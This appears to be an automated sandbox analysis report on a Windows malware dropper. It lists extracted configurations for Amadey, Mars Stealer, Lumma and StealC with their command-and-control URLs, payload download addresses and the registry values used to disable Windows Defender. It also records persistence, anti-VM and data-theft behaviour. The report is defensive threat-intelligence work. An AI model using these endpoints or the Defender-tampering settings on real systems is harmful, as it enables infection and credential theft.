Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
17/03/2025, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
Resource
win10v2004-20250313-en
General
-
Target
53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
-
Size
2.1MB
-
MD5
d9f00ea479721f7581810bda98dca097
-
SHA1
0b438eab56eb426d68bdeb2bd7c6f69af19daca6
-
SHA256
53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1
-
SHA512
af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55
-
SSDEEP
49152:JEESzuUhMGOiuMWTSby13yX9FIgn3ITa02qmF:JQBbHWTr1493Y+IU
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
marsstealer
Default
ctrlgem.xyz/gate.php
Extracted
lumma
https://gunrightsp.run/api
https://caliberc.today/api
https://pistolpra.bet/api
https://weaponwo.life/api
https://armamenti.world/api
https://selfdefens.bet/api
https://targett.top/api
https://armoryarch.shop/api
https://blackeblast.run/api
https://kbracketba.shop/api
https://featureccus.shop/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://htardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://latchclan.shop/api
https://codxefusion.top/api
https://hardswarehub.today/api
https://pgadgethgfub.icu/api
https://hardrwarehaven.run/api
https://techmindzs.live/api
https://bz2ncodxefusion.top/api
https://quietswtreams.life/api
https://techspherxe.top/api
https://earthsymphzony.today/api
https://loadoutle.life/api
https://gcaliberc.today/api
https://8blackeblast.run/api
https://zfurrycomp.top/api
https://tcrosshairc.life/api
https://hhtardwarehu.icu/api
https://weaponrywo.digital/api
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
lumma
https://codxefusion.top/api
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 2 IoCs
resource yara_rule behavioral1/memory/3836-849-0x00000000008F0000-0x0000000000D54000-memory.dmp healer behavioral1/memory/3836-850-0x00000000008F0000-0x0000000000D54000-memory.dmp healer -
Healer family
-
Lumma family
-
Mars Stealer
An infostealer written in C++ based on other infostealers.
-
Marsstealer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 2331254737.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 2331254737.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 2331254737.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 2331254737.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 2331254737.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 2331254737.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 2331254737.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2331254737.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 2331254737.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 2331254737.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a732227be0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ GGM65FE7W5E2IVW6D.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cbe223688e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ df0bb5d7c6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2331254737.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e80c7de81f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 334c4d4149.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 334c4d4149.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7c26c6a0f8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 53a0816cdb.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 21 1680 powershell.exe 29 2408 powershell.exe -
pid Process 600 powershell.exe 2172 powershell.exe 2132 powershell.exe 2408 powershell.exe 1680 powershell.exe -
Downloads MZ/PE file 27 IoCs
flow pid Process 212 2820 svchost015.exe 12 2996 rapes.exe 29 2408 powershell.exe 167 2996 rapes.exe 195 2996 rapes.exe 5 2996 rapes.exe 38 840 futors.exe 50 620 a732227be0.exe 15 2996 rapes.exe 15 2996 rapes.exe 15 2996 rapes.exe 15 2996 rapes.exe 15 2996 rapes.exe 15 2996 rapes.exe 15 2996 rapes.exe 15 2996 rapes.exe 28 840 futors.exe 28 840 futors.exe 28 840 futors.exe 28 840 futors.exe 28 840 futors.exe 211 3896 svchost015.exe 163 840 futors.exe 201 2996 rapes.exe 213 3332 svchost015.exe 21 1680 powershell.exe 46 840 futors.exe -
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7c26c6a0f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GGM65FE7W5E2IVW6D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2331254737.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a732227be0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cbe223688e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e80c7de81f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 334c4d4149.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion df0bb5d7c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2331254737.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e80c7de81f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion df0bb5d7c6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 334c4d4149.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7c26c6a0f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a732227be0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 53a0816cdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 53a0816cdb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 334c4d4149.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 334c4d4149.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GGM65FE7W5E2IVW6D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cbe223688e.exe -
Executes dropped EXE 44 IoCs
pid Process 2996 rapes.exe 1052 UD49QH6.exe 1028 m0wsoI3.exe 1856 amnew.exe 840 futors.exe 620 36407e4594.exe 2828 Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE 1600 trano1221.exe 1964 trano1221.exe 1196 Process not Found 1916 7c26c6a0f8.exe 1188 cronikxqqq.exe 1004 483d2fa8a0d53818306efeb32d3.exe 2204 dw.exe 620 a732227be0.exe 2788 cronikxqqq.exe 1320 v7942.exe 2200 df0bb5d7c6.exe 2008 GGM65FE7W5E2IVW6D.exe 288 crypted.exe 1500 5c15ee7bad.exe 1352 crypted.exe 2768 crypted.exe 3836 2331254737.exe 3184 mrwipre12.exe 3408 00282f69cd.exe 3444 00282f69cd.exe 3844 kollfdsf.exe 2480 e80c7de81f.exe 3324 cbe223688e.exe 3688 e80c7de81f.exe 3896 svchost015.exe 3992 334c4d4149.exe 3132 334c4d4149.exe 2820 svchost015.exe 3332 svchost015.exe 3112 53a0816cdb.exe 3704 UD49QH6.exe 3988 zY9sqWs.exe 3500 Gxtuum.exe 972 m0wsoI3.exe 3392 HmngBpR.exe 2876 SplashWin.exe 3940 SplashWin.exe -
Identifies Wine through registry keys 2 TTPs 16 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 7c26c6a0f8.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 2331254737.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 334c4d4149.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine a732227be0.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine df0bb5d7c6.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine GGM65FE7W5E2IVW6D.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine e80c7de81f.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine cbe223688e.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 334c4d4149.exe Key opened \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Wine 53a0816cdb.exe -
Loads dropped DLL 64 IoCs
pid Process 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 2996 rapes.exe 2996 rapes.exe 2996 rapes.exe 2996 rapes.exe 2996 rapes.exe 1856 amnew.exe 2996 rapes.exe 1680 powershell.exe 840 futors.exe 1600 trano1221.exe 1964 trano1221.exe 1964 trano1221.exe 1964 trano1221.exe 1964 trano1221.exe 1964 trano1221.exe 1964 trano1221.exe 1964 trano1221.exe 1028 m0wsoI3.exe 1028 m0wsoI3.exe 2996 rapes.exe 840 futors.exe 2408 powershell.exe 840 futors.exe 2996 rapes.exe 2996 rapes.exe 1188 cronikxqqq.exe 2192 WerFault.exe 2192 WerFault.exe 2192 WerFault.exe 2192 WerFault.exe 2192 WerFault.exe 1996 WerFault.exe 1996 WerFault.exe 1996 WerFault.exe 1996 WerFault.exe 1996 WerFault.exe 840 futors.exe 840 futors.exe 1132 WerFault.exe 1132 WerFault.exe 1132 WerFault.exe 1132 WerFault.exe 2996 rapes.exe 2996 rapes.exe 620 a732227be0.exe 840 futors.exe 540 WerFault.exe 540 WerFault.exe 540 WerFault.exe 540 WerFault.exe 2996 rapes.exe 840 futors.exe 840 futors.exe 1352 crypted.exe 2996 rapes.exe 2996 rapes.exe 840 futors.exe 3248 WerFault.exe 3248 WerFault.exe 3248 WerFault.exe 3248 WerFault.exe 2996 rapes.exe 2996 rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 2331254737.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 2331254737.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238510121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\a732227be0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238900101\\a732227be0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\df0bb5d7c6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238910101\\df0bb5d7c6.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\5c15ee7bad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238920101\\5c15ee7bad.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\2331254737.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238930101\\2331254737.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\e80c7de81f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030740101\\e80c7de81f.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\334c4d4149.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030750101\\334c4d4149.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\36407e4594.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10238500101\\36407e4594.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0006000000018b4e-101.dat autoit_exe behavioral1/files/0x0006000000019d40-641.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 2520 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe 2996 rapes.exe 1052 UD49QH6.exe 2828 Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE 1916 7c26c6a0f8.exe 1004 483d2fa8a0d53818306efeb32d3.exe 620 a732227be0.exe 2200 df0bb5d7c6.exe 2008 GGM65FE7W5E2IVW6D.exe 3836 2331254737.exe 3324 cbe223688e.exe 3688 e80c7de81f.exe 3992 334c4d4149.exe 3132 334c4d4149.exe 3112 53a0816cdb.exe 3704 UD49QH6.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1188 set thread context of 2788 1188 cronikxqqq.exe 73 PID 1352 set thread context of 2768 1352 crypted.exe 92 PID 3408 set thread context of 3444 3408 00282f69cd.exe 111 PID 3688 set thread context of 3896 3688 e80c7de81f.exe 119 PID 3132 set thread context of 2820 3132 334c4d4149.exe 122 PID 3992 set thread context of 3332 3992 334c4d4149.exe 123 PID 3940 set thread context of 2356 3940 SplashWin.exe 136 -
resource yara_rule behavioral1/files/0x000500000001c8c4-359.dat upx behavioral1/memory/1964-361-0x000007FEF6060000-0x000007FEF6649000-memory.dmp upx -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0005000000019297-230.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 2192 1188 WerFault.exe 64 1996 2788 WerFault.exe 73 3988 3324 WerFault.exe 117 1616 2164 WerFault.exe 142 -
System Location Discovery: System Language Discovery 1 TTPs 62 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2331254737.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbe223688e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SCHTASKS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m0wsoI3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36407e4594.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 334c4d4149.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 334c4d4149.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53a0816cdb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UD49QH6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7c26c6a0f8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a732227be0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5c15ee7bad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 5c15ee7bad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00282f69cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SplashWin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 00282f69cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 5c15ee7bad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df0bb5d7c6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e80c7de81f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m0wsoI3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m0wsoI3.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 2732 timeout.exe 2504 timeout.exe 4012 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 2620 taskkill.exe 2480 taskkill.exe 2056 taskkill.exe 2732 taskkill.exe 580 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 9 IoCs
